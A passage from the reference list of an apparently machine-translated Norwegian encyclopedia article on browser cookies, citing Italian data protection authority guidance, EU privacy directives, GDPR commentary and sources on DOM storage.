  16. ^ Internett: Personverngaranti, nei til informasjonskapsler for profilering uten samtykke - Personverngaranti , på garanteprivacy.it . Hentet 10. januar 2016 (Arkiveret fra originalen 10. januar 2016) .
  17. ^ Personvernkode [Konsolidert tekst ... - Personverngaranti , på garanteprivacy.it . Hentet 10. januar 2016 (arkivert fra originalen 13. januar 2016) .
  18. ^ De nye reglene for informasjonskapsler , på ict4executive.it . Hentet 26. mai 2015 (arkivert fra originalen 26. mai 2015) .
  19. ^ Forklaringer angående implementeringen av lovgivningen om informasjonskapsler - Personverngarantien , på garanteprivacy.it . Hentet 10. januar 2016 (arkivert fra den opprinnelige url 8. januar 2016) .
  20. ^ Personvernkode [Konsolidert tekst ... - Personverngaranti , på garanteprivacy.it . Hentet 10. januar 2016 (arkivert fra originalen 13. januar 2016) .
  21. ^ https://www.assoprivacy.eu/cookie-dal-9-gennaio-2022-scatta-lobbligo-di-adeguamento/
  22. ^ Direktiv 95/46/EF , på eur-lex.europa.eu .
  23. ^ EU-kommisjonens pressemelding som kunngjør den foreslåtte omfattende reformen av reglene for databeskyttelse , på europa.eu .
  24. ^ Implikasjoner av GDPR på håndtering av informasjonskapsler (på engelsk) ( PDF ), på onetrust.com .
  25. ^ Implikasjoner av GDPR for håndtering av informasjonskapsler (på engelsk) , på ittrust.eu . Hentet 3. januar 2018 (arkivert fra originalen 1. oktober 2020) .
  26. ^ Forslag om personvern , på ec.europa.eu .
  27. ^ IAB Europe-posisjon ( PDF ), på iabeurope.eu . Hentet 3. januar 2018 (arkivert fra originalen 4. januar 2018) .
  28. ^ EPprivacy Proposed Critique (på engelsk) , på adversitement.com . Hentet 3. januar 2018 (arkivert fra originalen 4. januar 2018) .
  29. ^ Hvordan deaktivere datadeling på Google Analyitcs , på iubenda.com .
  30. ^ Lagring av dokumentobjektmodell
  31. ^ http://www.matarrelli.com/w3c/cose-il-dom-storage
  32. ^ HTML5 Web Storage. (
  33. ^ https://www.isunshare.com/blog/enable-dom-storage-in-ie-ff-google-chrome-windows-10/

Relaterte elementer

Andre prosjekter

Eksterne lenker